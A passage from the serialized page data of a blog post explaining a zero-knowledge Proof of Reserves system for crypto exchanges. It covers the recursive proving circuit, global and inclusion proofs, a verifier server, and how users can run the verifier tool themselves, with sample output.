":28,"tag":116,"props":95773,"children":95775},{"className":95774},[3680,21251],[95776],{"type":33,"value":29},{"type":28,"tag":116,"props":95778,"children":95780},{"className":95779},[3680,21251],[95781],{"type":33,"value":92922},{"type":28,"tag":116,"props":95783,"children":95785},{"className":95784},[3680,21251],[95786],{"type":33,"value":2893},{"type":28,"tag":116,"props":95788,"children":95790},{"className":95789,"style":92675},[3680,21251],[95791],{"type":33,"value":92678},{"type":28,"tag":116,"props":95793,"children":95795},{"className":95794},[3680,21251],[95796],{"type":33,"value":3408},{"type":28,"tag":116,"props":95798,"children":95800},{"className":95799},[3680,21251],[95801],{"type":33,"value":1797},{"type":28,"tag":116,"props":95803,"children":95805},{"className":95804,"style":92663},[3680],[95806],{"type":33,"value":2754},{"type":28,"tag":116,"props":95808,"children":95810},{"className":95809},[3680,21251],[95811],{"type":33,"value":95114},{"type":28,"tag":116,"props":95813,"children":95815},{"className":95814},[3680,21251],[95816],{"type":33,"value":29},{"type":28,"tag":116,"props":95818,"children":95820},{"className":95819},[3680,21251],[95821],{"type":33,"value":92922},{"type":28,"tag":116,"props":95823,"children":95825},{"className":95824},[3680,21251],[95826],{"type":33,"value":1554},{"type":28,"tag":116,"props":95828,"children":95830},{"className":95829},[3680],[95831],{"type":33,"value":141},{"type":28,"tag":116,"props":95833,"children":95835},{"className":95834},[3680,21251],[95836],{"type":33,"value":87},{"type":28,"tag":116,"props":95838,"children":95840},{"className":95839},[3680,21251],[95841],{"type":33,"value":92654},{"type":28,"tag":116,"props":95843,"children":95845},{"className":95844},[3680,21251],[95846],{"type":33,"value":1554},{"type":28,"tag":116,"props":95848,"children":95850},{"className":95849,"style":92663},[3680],[95851],{"type":33,"value":2754},{"type":28,"tag":116,"props":95853,"children":95855},{"className":95854},[3680,21251],[95856],{"type":33,"value":29},{"type":28,"tag":116,"props":95858,"children":95860},{"className":95859,"style":92663},[3680,21251],[95861],{"type":33,"value":93482},{"type":28,"tag":116,"props":95863,"children":95865},{"className":95864},[3680,21251],[95866],{"type":33,"value":3408},{"type":28,"tag":116,"props":95868,"children":95870},{"className":95869},[3680,21251],[95871],{"type":33,"value":93493},{"type":28,"tag":116,"props":95873,"children":95875},{"className":95874},[21380],[95876],{"type":33,"value":347},{"type":28,"tag":116,"props":95878,"children":95880},{"className":95879},[3680,21251],[95881],{"type":33,"value":87},{"type":28,"tag":116,"props":95883,"children":95885},{"className":95884},[3680,21251],[95886],{"type":33,"value":92654},{"type":28,"tag":116,"props":95888,"children":95890},{"className":95889},[3680,21251],[95891],{"type":33,"value":1554},{"type":28,"tag":116,"props":95893,"children":95895},{"className":95894,"style":92663},[3680],[95896],{"type":33,"value":2754},{"type":28,"tag":116,"props":95898,"children":95900},{"className":95899},[3680,21251],[95901],{"type":33,"value":56022},{"type":28,"tag":116,"props":95903,"children":95905},{"className":95904},[3680,21251],[95906],{"type":33,"value":92922},{"type":28,"tag":116,"props":95908,"children":95910},{"className":95909},[3680,21251],[95911],{"type":33,"value":50752},{"type":28,"tag":116,"props":95913,"children":95915},{"className":95914},[21401],[95916],{"type":33,"value":15074},{"type":33,"value":6129},{"type":28,"tag":4995,"props":95919,"children":95920},{},[95921],{"type":33,"value":95922},"(verifies if all asset prices are the same)",{"type":28,"tag":459,"props":95924,"children":95925},{},[95926,96305,96306],{"type":28,"tag":98,"props":95927,"children":95929},{"className":95928},[3652,3653],[95930],{"type":28,"tag":116,"props":95931,"children":95933},{"className":95932},[3658],[95934],{"type":28,"tag":116,"props":95935,"children":95937},{"className":95936,"ariaHidden":3664},[3663],[95938,96019],{"type":28,"tag":116,"props":95939,"children":95941},{"className":95940},[3669],[95942,95946,95951,95956,95961,95966,95971,95976,95981,95986,95991,95996,96001,96006,96010,96015],{"type":28,"tag":116,"props":95943,"children":95945},{"className":95944,"style":94076},[3674],[],{"type":28,"tag":116,"props":95947,"children":95949},{"className":95948},[3680,21251],[95950],{"type":33,"value":50752},{"type":28,"tag":116,"props":95952,"children":95954},{"className":95953,"style":92663},[3680,21251],[95955],{"type":33,"value":94088},{"type":28,"tag":116,"props":95957,"children":95959},{"className":95958,"style":94092},[3680,21251],[95960],{"type":33,"value":88302},{"type":28,"tag":116,"props":95962,"children":95964},{"className":95963,"style":92675},[3680,21251],[95965],{"type":33,"value":92678},{"type":28,"tag":116,"props":95967,"children":95969},{"className":95968},[3680,21251],[95970],{"type":33,"value":1413},{"type":28,"tag":116,"props":95972,"children":95974},{"className":95973,"style":92663},[3680],[95975],{"type":33,"value":2754},{"type":28,"tag":116,"props":95977,"children":95979},{"className":95978},[3680,21251],[95980],{"type":33,"value":1554},{"type":28,"tag":116,"props":95982,"children":95984},{"className":95983},[3680,21251],[95985],{"type":33,"value":94120},{"type":28,"tag":116,"props":95987,"children":95989},{"className":95988,"style":92663},[3680],[95990],{"type":33,"value":2754},{"type":28,"tag":116,"props":95992,"children":95994},{"className":95993},[3680,21251],[95995],{"type":33,"value":94131},{"type":28,"tag":116,"props":95997,"children":95999},{"className":95998},[3680,21251],[96000],{"type":33,"value":10318},{"type":28,"tag":116,"props":96002,"children":96004},{"className":96003},[3680,21251],[96005],{"type":33,"value":83963},{"type":28,"tag":116,"props":96007,"children":96009},{"className":96008,"style":3857},[3759],[],{"type":28,"tag":116,"props":96011,"children":96013},{"className":96012},[3862],[96014],{"type":33,"value":2340},{"type":28,"tag":116,"props":96016,"children":96018},{"className":96017,"style":3857},[3759],[],{"type":28,"tag":116,"props":96020,"children":96022},{"className":96021},[3669],[96023,96027,96032,96037,96042,96047,96052,96057,96062,96067,96072,96129,96134,96138,96143,96148,96205,96210,96214,96219,96224,96228,96233,96238,96300],{"type":28,"tag":116,"props":96024,"children":96026},{"className":96025,"style":3780},[3674],[],{"type":28,"tag":116,"props":96028,"children":96030},{"className":96029,"style":21252},[3680,21251],[96031],{"type":33,"value":21255},{"type":28,"tag":116,"props":96033,"children":96035},{"className":96034},[3680,21251],[96036],{"type":33,"value":92617},{"type":28,"tag":116,"props":96038,"children":96040},{"className":96039},[3680,21251],[96041],{"type":33,"value":3408},{"type":28,"tag":116,"props":96043,"children":96045},{"className":96044},[3680,21251],[96046],{"type":33,"value":70183},{"type":28,"tag":116,"props":96048,"children":96050},{"className":96049},[3680,21251],[96051],{"type":33,"value":92633},{"type":28,"tag":116,"props":96053,"children":96055},{"className":96054},[3680,21251],[96056],{"type":33,"value":56022},{"type":28,"tag":116,"props":96058,"children":96060},{"className":96059},[21380],[96061],{"type":33,"value":313},{"type":28,"tag":116,"props":96063,"children":96065},{"className":96064},[3680,21251],[96066],{"type":33,"value":94131},{"type":28,"tag":116,"props":96068,"children":96070},{"className":96069},[3680,21251],[96071],{"type":33,"value":10318},{"type":28,"tag":116,"props":96073,"children":96075},{"className":96074},[3680],[96076,96081],{"type":28,"tag":116,"props":96077,"children":96079},{"className":96078},[3680,21251],[96080],{"type":33,"value":83963},{"type":28,"tag":116,"props":96082,"children":96084},{"className":96083},[3695],[96085],{"type":28,"tag":116,"props":96086,"children":96088},{"className":96087},[3700,21305],[96089,96118],{"type":28,"tag":116,"props":96090,"children":96092},{"className":96091},[3705],[96093,96113],{"type":28,"tag":116,"props":96094,"children":96096},{"className":96095,"style":92715},[3710],[96097],{"type":28,"tag":116,"props":96098,"children":96099},{"style":92719},[96100,96104],{"type":28,"tag":116,"props":96101,"children":96103},{"className":96102,"style":3720},[3719],[],{"type":28,"tag":116,"props":96105,"children":96107},{"className":96106},[3725,3726,3727,3728],[96108],{"type":28,"tag":116,"props":96109,"children":96111},{"className":96110},[3680,3728],[96112],{"type":33,"value":353},{"type":28,"tag":116,"props":96114,"children":96116},{"className":96115},[21407],[96117],{"type":33,"value":21410},{"type":28,"tag":116,"props":96119,"children":96121},{"className":96120},[3705],[96122],{"type":28,"tag":116,"props":96123,"children":96125},{"className":96124,"style":92746},[3710],[96126],{"type":28,"tag":116,"props":96127,"children":96128},{},[],{"type":28,"tag":116,"props":96130,"children":96132},{"className":96131},[3791],[96133],{"type":33,"value":3794},{"type":28,"tag":116,"props":96135,"children":96137},{"className":96136,"style":3798},[3759],[],{"type":28,"tag":116,"props":96139,"children":96141},{"className":96140},[3680,21251],[96142],{"type":33,"value":94131},{"type":28,"tag":116,"props":96144,"children":96146},{"className":96145},[3680,21251],[96147],{"type":33,"value":10318},{"type":28,"tag":116,"props":96149,"children":96151},{"className":96150},[3680],[96152,96157],{"type":28,"tag":116,"props":96153,"children":96155},{"className":96154},[3680,21251],[96156],{"type":33,"value":83963},{"type":28,"tag":116,"props":96158,"children":96160},{"className":96159},[3695],[96161],{"type":28,"tag":116,"props":96162,"children":96164},{"className":96163},[3700,21305],[96165,96194],{"type":28,"tag":116,"props":96166,"children":96168},{"className":96167},[3705],[96169,96189],{"type":28,"tag":116,"props":96170,"children":96172},{"className":96171,"style":92715},[3710],[96173],{"type":28,"tag":116,"props":96174,"children":96175},{"style":92719},[96176,96180],{"type":28,"tag":116,"props":96177,"children":96179},{"className":96178,"style":3720},[3719],[],{"type":28,"tag":116,"props":96181,"children":96183},{"className":96182},[3725,3726,3727,3728],[96184],{"type":28,"tag":116,"props":96185,"children":96187},{"className":96186},[3680,3728],[96188],{"type":33,"value":1824},{"type":28,"tag":116,"props":96190,"children":96192},{"className":96191},[21407],[96193],{"type":33,"value":21410},{"type":28,"tag":116,"props":96195,"children":96197},{"className":96196},[3705],[96198],{"type":28,"tag":116,"props":96199,"children":96201},{"className":96200,"style":92746},[3710],[96202],{"type":28,"tag":116,"props":96203,"children":96204},{},[],{"type":28,"tag":116,"props":96206,"children":96208},{"className":96207},[3791],[96209],{"type":33,"value":3794},{"type":28,"tag":116,"props":96211,"children":96213},{"className":96212,"style":3798},[3759],[],{"type":28,"tag":116,"props":96215,"children":96217},{"className":96216},[3680],[96218],{"type":33,"value":9259},{"type":28,"tag":116,"props":96220,"children":96222},{"className":96221},[3791],[96223],{"type":33,"value":3794},{"type":28,"tag":116,"props":96225,"children":96227},{"className":96226,"style":3798},[3759],[],{"type":28,"tag":116,"props":96229,"children":96231},{"className":96230},[3680,21251],[96232],{"type":33,"value":94131},{"type":28,"tag":116,"props":96234,"children":96236},{"className":96235},[3680,21251],[96237],{"type":33,"value":10318},{"type":28,"tag":116,"props":96239,"children":96241},{"className":96240},[3680],[96242,96247],{"type":28,"tag":116,"props":96243,"children":96245},{"className":96244},[3680,21251],[96246],{"type":33,"value":83963},{"type":28,"tag":116,"props":96248,"children":96250},{"className":96249},[3695],[96251],{"type":28,"tag":116,"props":96252,"children":96254},{"className":96253},[3700,21305],[96255,96289],{"type":28,"tag":116,"props":96256,"children":96258},{"className":96257},[3705],[96259,96284],{"type":28,"tag":116,"props":96260,"children":96262},{"className":96261,"style":92715},[3710],[96263],{"type":28,"tag":116,"props":96264,"children":96265},{"style":92719},[96266,96270],{"type":28,"tag":116,"props":96267,"children":96269},{"className":96268,"style":3720},[3719],[],{"type":28,"tag":116,"props":96271,"children":96273},{"className":96272},[3725,3726,3727,3728],[96274],{"type":28,"tag":116,"props":96275,"children":96277},{"className":96276},[3680,3728],[96278],{"type":28,"tag":116,"props":96279,"children":96281},{"className":96280},[3680,3728],[96282],{"type":33,"value":96283},"31",{"type":28,"tag":116,"props":96285,"children":96287},{"className":96286},[21407],[96288],{"type":33,"value":21410},{"type":28,"tag":116,"props":96290,"children":96292},{"className":96291},[3705],[96293],{"type":28,"tag":116,"props":96294,"children":96296},{"className":96295,"style":92746},[3710],[96297],{"type":28,"tag":116,"props":96298,"children":96299},{},[],{"type":28,"tag":116,"props":96301,"children":96303},{"className":96302},[21401],[96304],{"type":33,"value":1829},{"type":33,"value":6129},{"type":28,"tag":4995,"props":96307,"children":96308},{},[96309],{"type":33,"value":94451},{"type":28,"tag":459,"props":96311,"children":96312},{},[96313,96318,96319],{"type":28,"tag":2583,"props":96314,"children":96315},{},[96316],{"type":33,"value":96317},"checks if each sum is overflowing by checking if the sum of two positive numbers results in a negative one",{"type":33,"value":6129},{"type":28,"tag":4995,"props":96320,"children":96321},{},[96322],{"type":33,"value":94735},{"type":28,"tag":29,"props":96324,"children":96325},{},[96326],{"type":33,"value":96327},"Here is a visual scheme of the inputs of the recursive circuit. Note that this tree only has three levels (L1, L2, L3). Depending on the number of users, it may have more recursive levels:",{"type":28,"tag":29,"props":96329,"children":96330},{},[96331],{"type":28,"tag":206,"props":96332,"children":96334},{"alt":50198,"src":96333},"/posts/por/recursive-circuit.png",[],{"type":28,"tag":63,"props":96336,"children":96338},{"id":96337},"global-proof-and-inclusion-proofs",[96339],{"type":33,"value":96340},"Global Proof and Inclusion Proofs",{"type":28,"tag":75,"props":96342,"children":96343},{"id":8949},[96344],{"type":33,"value":96345},"Proving",{"type":28,"tag":29,"props":96347,"children":96348},{},[96349,96351,96357,96358,96364,96365,96371],{"type":33,"value":96350},"After proving all batch circuits and all recursive circuits, we have the final proof (which is the ZK proof of the recursive tree root), the entire Merkle tree, and the user nonces. In our code, it is serialized to ",{"type":28,"tag":98,"props":96352,"children":96354},{"className":96353},[],[96355],{"type":33,"value":96356},"merkle_tree.json",{"type":33,"value":825},{"type":28,"tag":98,"props":96359,"children":96361},{"className":96360},[],[96362],{"type":33,"value":96363},"final_proof.json",{"type":33,"value":6159},{"type":28,"tag":98,"props":96366,"children":96368},{"className":96367},[],[96369],{"type":33,"value":96370},"private_nonces.json",{"type":33,"value":96372}," files.",{"type":28,"tag":29,"props":96374,"children":96375},{},[96376],{"type":33,"value":96377},"Using the ZK proof and the Merkle tree, we can already prove the sum of the asset balances and their non-negativity; we refer to this as the \"global proof.\"",{"type":28,"tag":29,"props":96379,"children":96380},{},[96381,96383,96389,96391,96396],{"type":33,"value":96382},"For the user inclusion proofs, we get the Merkle tree, the user asset balances, the identification hash, and the nonce to bundle it in one proof file (",{"type":28,"tag":98,"props":96384,"children":96386},{"className":96385},[],[96387],{"type":33,"value":96388},"inclusion_proof_\u003Cid>.json",{"type":33,"value":96390},"). ",{"type":28,"tag":2583,"props":96392,"children":96393},{},[96394],{"type":33,"value":96395},"We bundle only a part of the Merkle tree to the inclusion proof file to make the proof smaller",{"type":33,"value":141},{"type":28,"tag":75,"props":96398,"children":96400},{"id":96399},"verifying",[96401],{"type":33,"value":96402},"Verifying",{"type":28,"tag":29,"props":96404,"children":96405},{},[96406],{"type":28,"tag":4995,"props":96407,"children":96408},{},[96409],{"type":33,"value":96410},"Global Proof",{"type":28,"tag":29,"props":96412,"children":96413},{},[96414,96416,96421,96422,96427],{"type":33,"value":96415},"To verify the global proof, the code deserializes the ",{"type":28,"tag":98,"props":96417,"children":96419},{"className":96418},[],[96420],{"type":33,"value":96356},{"type":33,"value":37173},{"type":28,"tag":98,"props":96423,"children":96425},{"className":96424},[],[96426],{"type":33,"value":96363},{"type":33,"value":96428}," files and performs these checks:",{"type":28,"tag":455,"props":96430,"children":96431},{},[96432,96437,96442,96447,96473],{"type":28,"tag":459,"props":96433,"children":96434},{},[96435],{"type":33,"value":96436},"Validate if the final proof was generated with a valid and trusted circuit.",{"type":28,"tag":459,"props":96438,"children":96439},{},[96440],{"type":33,"value":96441},"Verify the ZK final proof.",{"type":28,"tag":459,"props":96443,"children":96444},{},[96445],{"type":33,"value":96446},"Verify if asset prices are valid. (It doesn't verify if it matches the real price; you need to do it manually. It only verifies if decimals are valid.)",{"type":28,"tag":459,"props":96448,"children":96449},{},[96450,96452,96458,96460,96465,96466,96471],{"type":33,"value":96451},"Verify if the Merkle tree root hash is the same as the final proof ",{"type":28,"tag":98,"props":96453,"children":96455},{"className":96454},[],[96456],{"type":33,"value":96457},"merkle_tree_hash",{"type":33,"value":96459}," public input. This ensures that the ",{"type":28,"tag":98,"props":96461,"children":96463},{"className":96462},[],[96464],{"type":33,"value":96356},{"type":33,"value":10659},{"type":28,"tag":98,"props":96467,"children":96469},{"className":96468},[],[96470],{"type":33,"value":96363},{"type":33,"value":96472}," are linked (they belong to the same global proof).",{"type":28,"tag":459,"props":96474,"children":96475},{},[96476],{"type":33,"value":96477},"Verify the entire Merkle tree by hashing all the nodes again, starting with the batch circuit, since the verifier won't have the necessary information to hash the leaves again (for privacy). This ensures that the tree was not tampered with.",{"type":28,"tag":29,"props":96479,"children":96480},{},[96481],{"type":28,"tag":4995,"props":96482,"children":96483},{},[96484],{"type":33,"value":96485},"Inclusion Proof",{"type":28,"tag":29,"props":96487,"children":96488},{},[96489,96491,96496,96498,96503],{"type":33,"value":96490},"To verify the inclusion proof, the code deserializes the ",{"type":28,"tag":98,"props":96492,"children":96494},{"className":96493},[],[96495],{"type":33,"value":96388},{"type":33,"value":96497}," file and also the ",{"type":28,"tag":98,"props":96499,"children":96501},{"className":96500},[],[96502],{"type":33,"value":96363},{"type":33,"value":96504},". After that, it performs these checks:",{"type":28,"tag":455,"props":96506,"children":96507},{},[96508,96512,96517,96522],{"type":28,"tag":459,"props":96509,"children":96510},{},[96511],{"type":33,"value":96441},{"type":28,"tag":459,"props":96513,"children":96514},{},[96515],{"type":33,"value":96516},"Verify if the Merkle tree root is the same as in the final proof.",{"type":28,"tag":459,"props":96518,"children":96519},{},[96520],{"type":33,"value":96521},"Recalculate the user-related node leaf hash.",{"type":28,"tag":459,"props":96523,"children":96524},{},[96525],{"type":33,"value":96526},"Verify a partial Merkle tree using the recalculated hash (it doesn't contain all the leaves).",{"type":28,"tag":63,"props":96528,"children":96530},{"id":96529},"por-verifier-server",[96531],{"type":33,"value":96532},"PoR Verifier Server",{"type":28,"tag":29,"props":96534,"children":96535},{},[96536,96538,96544],{"type":33,"value":96537},"To automate the verification process, we created a ",{"type":28,"tag":87,"props":96539,"children":96541},{"href":92174,"rel":96540},[91],[96542],{"type":33,"value":96543},"verifier server",{"type":33,"value":96545}," that the exchange can submit the proofs into. Once submitted, the proof is validated and added to the database.",{"type":28,"tag":29,"props":96547,"children":96548},{},[96549],{"type":33,"value":96550},"Once the proof was added, any user can enter the website and see its information (see backpack's example):",{"type":28,"tag":29,"props":96552,"children":96553},{},[96554],{"type":28,"tag":206,"props":96555,"children":96557},{"alt":50198,"src":96556},"/posts/por/backpack-por.png",[],{"type":28,"tag":29,"props":96559,"children":96560},{},[96561],{"type":33,"value":96562},"Here is a breakdown of what fields represent and why they are required:",{"type":28,"tag":2108,"props":96564,"children":96565},{},[96566,96576,96586,96596,96606,96616],{"type":28,"tag":459,"props":96567,"children":96568},{},[96569,96574],{"type":28,"tag":4995,"props":96570,"children":96571},{},[96572],{"type":33,"value":96573},"Status",{"type":33,"value":96575}," --> verifies if the proof is valid, ensuring that the information has not been tampered with.",{"type":28,"tag":459,"props":96577,"children":96578},{},[96579,96584],{"type":28,"tag":4995,"props":96580,"children":96581},{},[96582],{"type":33,"value":96583},"Proof Timestamp",{"type":33,"value":96585}," --> when the proof was generated by the exchange.",{"type":28,"tag":459,"props":96587,"children":96588},{},[96589,96594],{"type":28,"tag":4995,"props":96590,"children":96591},{},[96592],{"type":33,"value":96593},"Verify Timestamp",{"type":33,"value":96595}," --> when the proof was verified by the PoR server.",{"type":28,"tag":459,"props":96597,"children":96598},{},[96599,96604],{"type":28,"tag":4995,"props":96600,"children":96601},{},[96602],{"type":33,"value":96603},"Proof File URL",{"type":33,"value":96605}," --> the URL where the proof was downloaded from. Users can download it to verify the proof's validity themselves.",{"type":28,"tag":459,"props":96607,"children":96608},{},[96609,96614],{"type":28,"tag":4995,"props":96610,"children":96611},{},[96612],{"type":33,"value":96613},"Prover Version",{"type":33,"value":96615}," --> the version of PoRv2 used. Using different versions for proving/verifying can result in errors due to ZK circuit discrepancies. Therefore, if you are going to verify the validity of the proof yourself, ensure that you download and use the same prover version as the proof.",{"type":28,"tag":459,"props":96617,"children":96618},{},[96619,96624],{"type":28,"tag":4995,"props":96620,"children":96621},{},[96622],{"type":33,"value":96623},"File Hash (SHA256)",{"type":33,"value":96625}," --> since we only store the URL of the proof, it can be maliciously changed after our verification. SHA256 can be used to prove if the file was modified after the verification. If you are going to verify the proof by yourself, check if the downloaded zip file matches the hash shown on the website.",{"type":28,"tag":29,"props":96627,"children":96628},{},[96629],{"type":33,"value":96630},"Also, you can check the exchange's liabilities on the website:",{"type":28,"tag":29,"props":96632,"children":96633},{},[96634],{"type":28,"tag":206,"props":96635,"children":96637},{"alt":50198,"src":96636},"/posts/por/backpack-por-liabilities.png",[],{"type":28,"tag":29,"props":96639,"children":96640},{},[96641,96643,96649,96651,96657],{"type":33,"value":96642},"These are the amount of assets that the exchange should have in their reserves to be solvent on each asset. You can match if they have it by checking their reserve wallets on blockchain. You can see backpack's wallets in ",{"type":28,"tag":87,"props":96644,"children":96647},{"href":96645,"rel":96646},"https://backpack.exchange/reserves",[91],[96648],{"type":33,"value":96645},{"type":33,"value":96650}," and our verifier server for backpack at ",{"type":28,"tag":87,"props":96652,"children":96655},{"href":96653,"rel":96654},"https://backpack-por.osec.io/",[91],[96656],{"type":33,"value":96653},{"type":33,"value":141},{"type":28,"tag":63,"props":96659,"children":96661},{"id":96660},"self-verification",[96662],{"type":33,"value":96663},"Self-verification",{"type":28,"tag":29,"props":96665,"children":96666},{},[96667],{"type":33,"value":96668},"You, as a user, can verify both proofs by yourself, the inclusion proof to verify if you were included in the PoR total liabilities sum and the global proof to verify if the commitments provided by the exchange are valid.",{"type":28,"tag":75,"props":96670,"children":96672},{"id":96671},"how-to-verify-if-i-was-included",[96673],{"type":33,"value":96674},"How to verify if I was included?",{"type":28,"tag":29,"props":96676,"children":96677},{},[96678],{"type":33,"value":96679},"If you are a user and want to do the self-verification of inclusion, you will need to follow these steps:",{"type":28,"tag":455,"props":96681,"children":96682},{},[96683,96694,96712],{"type":28,"tag":459,"props":96684,"children":96685},{},[96686,96693],{"type":28,"tag":87,"props":96687,"children":96690},{"href":96688,"rel":96689},"https://github.com/otter-sec/por_v2/releases",[91],[96691],{"type":33,"value":96692},"Download the PoRv2 executable from our github",{"type":33,"value":141},{"type":28,"tag":459,"props":96695,"children":96696},{},[96697,96699,96704,96705,96710],{"type":33,"value":96698},"Download the inclusion and the final proof files from the exchange (",{"type":28,"tag":98,"props":96700,"children":96702},{"className":96701},[],[96703],{"type":33,"value":96388},{"type":33,"value":10659},{"type":28,"tag":98,"props":96706,"children":96708},{"className":96707},[],[96709],{"type":33,"value":96363},{"type":33,"value":96711},") and put the files in the same directory as the PoRv2 app.",{"type":28,"tag":459,"props":96713,"children":96714},{},[96715,96717,96723],{"type":33,"value":96716},"Open the terminal and execute this: ",{"type":28,"tag":98,"props":96718,"children":96720},{"className":96719},[],[96721],{"type":33,"value":96722},"./plonky2_por verify-inclusion",{"type":33,"value":141},{"type":28,"tag":29,"props":96725,"children":96726},{},[96727],{"type":33,"value":96728},"This will verify if the proofs are valid and show your asset balances. You will need to verify manually that the balances are correct. Remember that the proofs are not calculated in real-time; you must verify if the balances were correct at the proof generation date. Here is an example of a valid proof being verified:",{"type":28,"tag":234,"props":96730,"children":96732},{"code":96731},"[!] The following information was used to generate the proof, please manually verify if they are correct:\n[!] NOTE: This is not real-time information, verify if the information is correct relative to the time of the proof generation\n[!] NOTE2: Some asset balances was rounded by some decimals, verify if they are close enough to the original balance\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset balances-----\nETH: 0\nBTC: 1.2\nUSDC: 0\n...\n======================\n[!] Verifying global proof (trusting circuit data inside the file)...\n[+] Global proof is valid!\n[!] Verifying inclusion proof...\n[+] Inclusion proof root hash is valid! The user is included in the merkle tree!\n[+] Successfully verified inclusion proof for file: inclusion_proof_00476816e43cf2efffdabdda7f55c5203bc9e28382c551f83931de02fd364a25.json\n\n[+] All inclusion proofs are valid!\n[+] Finished in 13.731875ms!\n",[96733],{"type":28,"tag":98,"props":96734,"children":96735},{"__ignoreMap":7},[96736],{"type":33,"value":96731},{"type":28,"tag":75,"props":96738,"children":96740},{"id":96739},"how-can-i-verify-the-global-proof",[96741],{"type":33,"value":96742},"How can I verify the global proof?",{"type":28,"tag":29,"props":96744,"children":96745},{},[96746],{"type":33,"value":96747},"If you want to verify if the global proof is valid, you just need to follow these steps:",{"type":28,"tag":455,"props":96749,"children":96750},{},[96751,96760,96778],{"type":28,"tag":459,"props":96752,"children":96753},{},[96754,96759],{"type":28,"tag":87,"props":96755,"children":96757},{"href":96688,"rel":96756},[91],[96758],{"type":33,"value":96692},{"type":33,"value":141},{"type":28,"tag":459,"props":96761,"children":96762},{},[96763,96765,96770,96771,96776],{"type":33,"value":96764},"Download the ",{"type":28,"tag":98,"props":96766,"children":96768},{"className":96767},[],[96769],{"type":33,"value":96356},{"type":33,"value":37173},{"type":28,"tag":98,"props":96772,"children":96774},{"className":96773},[],[96775],{"type":33,"value":96363},{"type":33,"value":96777}," files and put them in the same directory as the PoRv2 app. You can download those files from our PoR verifier server (download the zip file and unzip it).",{"type":28,"tag":459,"props":96779,"children":96780},{},[96781,96783,96788],{"type":33,"value":96782},"Open the terminal and execute ",{"type":28,"tag":98,"props":96784,"children":96786},{"className":96785},[],[96787],{"type":33,"value":96722},{"type":33,"value":96789},". This might take a while to verify since it needs to deserialize a big file and verify the final proof circuit (which involves rebuilding it).",{"type":28,"tag":29,"props":96791,"children":96792},{},[96793],{"type":33,"value":96794},"This will verify the global proof and print the asset prices to be manually verified. Note that the asset prices shown are not real-time; you must match them to the price on the proof generation date and time.",{"type":28,"tag":234,"props":96796,"children":96798},{"code":96797},"[!] Verifying the proof of reserves...\n[!] The following information was used to generate the proof, please manually verify if they are correct:\n[!] NOTE: This is not real-time information, verify if the information is correct relative to the time of the proof generation\n[!] NOTE2: Asset prices was rounded by some decimals, verify if they are close enough to the original price\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset prices-----\nBTC: US$ 95000\nETH: US$ 2402.48\n...\n======================\n",[96799],{"type":28,"tag":98,"props":96800,"children":96801},{"__ignoreMap":7},[96802],{"type":33,"value":96797},{"type":28,"tag":29,"props":96804,"children":96805},{},[96806],{"type":33,"value":96807},"When verification is completed, and all proofs are valid, the system will print the summed balances of each asset. These are the liabilities of the exchange, which you can use to check if they have reserves to cover it.",{"type":28,"tag":234,"props":96809,"children":96811},{"code":96810},"[!] Rebuilding root circuit... This might take several minutes...\n[+] Root circuit rebuilt successfully!\n[!] Verifying final proof...\n[+] Proof is valid!\n[!] Verifying asset prices...\n[+] Asset prices are valid!\n[!] Verifying asset decimals...\n[+] Asset decimals are valid!\n[!] Verifying merkle tree root hash...\n[+] Merkle tree root hash is valid!\n[!] Verifying merkle tree...\n[+] Merkle tree is valid!\n\n[!] The following information is the final needed asset reserves, which was validated by the Zero-Knowledge proof\n[!] NOTE: This is not real-time information, the information is relative to the time of the proof generation\n[!] NOTE2: We cannot guarantee that all users were included in the proof, but you can check if you were included by verifying the inclusion proof\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset reserves-----\nBTC: 1.2\nETH: 5.4\n...\n======================\n\n[+] All proofs are valid!\n[+] Finished in 4.455745214s!\n",[96812],{"type":28,"tag":98,"props":96813,"children":96814},{"__ignoreMap":7},[96815],{"type":33,"value":96810},{"type":28,"tag":63,"props":96817,"children":96818},{"id":2506},[96819],{"type":33,"value":2509},{"type":28,"tag":29,"props":96821,"children":96822},{},[96823],{"type":33,"value":96824},"In conclusion, Proof of Reserves serves as a crucial mechanism for crypto platforms, enabling them to demonstrate solvency and gain user trust in a transparent manner. By employing zero-knowledge proofs, platforms can achieve this transparency without exposing sensitive user data, effectively proving total liabilities and ensuring non-negativity while preserving privacy. Our system further refines this process, boosting efficiency and eliminating the need for manual verification.",{"type":28,"tag":29,"props":96826,"children":96827},{},[96828,96830,96836],{"type":33,"value":96829},"We are currently working with Backpack to implement this algorithm ",{"type":28,"tag":87,"props":96831,"children":96833},{"href":96645,"rel":96832},[91],[96834],{"type":33,"value":96835},"in production",{"type":33,"value":96837}," to generate and verify proofs every 24 hours. This marks a significant advancement toward establishing a real-time Proof of Reserves system, particularly given that it offers increased transparency, which is a step forward in reducing the need for external audit companies, as users will be able to verify everything themselves.",{"type":28,"tag":29,"props":96839,"children":96840},{},[96841,96843,96850],{"type":33,"value":96842},"For more information about how Backpack Exchange implements Proof of Reserves in practice, you can read their detailed article: ",{"type":28,"tag":87,"props":96844,"children":96847},{"href":96845,"rel":96846},"https://learn.backpack.exchange/articles/proof-of-reserves-at-backpack",[91],[96848],{"type":33,"value":96849},"Proof of Reserves at Backpack Exchange: Real Transparency, ZK Verified",{"type":33,"value":141},{"title":7,"searchDepth":256,"depth":256,"links":96852},[96853,96854,96855,96856,96859,96864,96868,96869,96873],{"id":92102,"depth":256,"text":92105},{"id":92183,"depth":256,"text":92186},{"id":92253,"depth":256,"text":92256},{"id":92307,"depth":256,"text":92310,"children":96857},[96858],{"id":92386,"depth":293,"text":92389},{"id":92474,"depth":256,"text":92477,"children":96860},[96861,96862,96863],{"id":92547,"depth":293,"text":92550},{"id":93019,"depth":293,"text":93022},{"id":94758,"depth":293,"text":94761},{"id":96337,"depth":256,"text":96340,"children":96865},[96866,96867],{"id":8949,"depth":293,"text":96345},{"id":96399,"depth":293,"text":96402},{"id":96529,"depth":256,"text":96532},{"id":96660,"depth":256,"text":96663,"children":96870},[96871,96872],{"id":96671,"depth":293,"text":96674},{"id":96739,"depth":293,"text":96742},{"id":2506,"depth":256,"text":2509},"content:blog:2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds.md","blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds.md","blog/2025-08-27-how-proof-of-reserves-u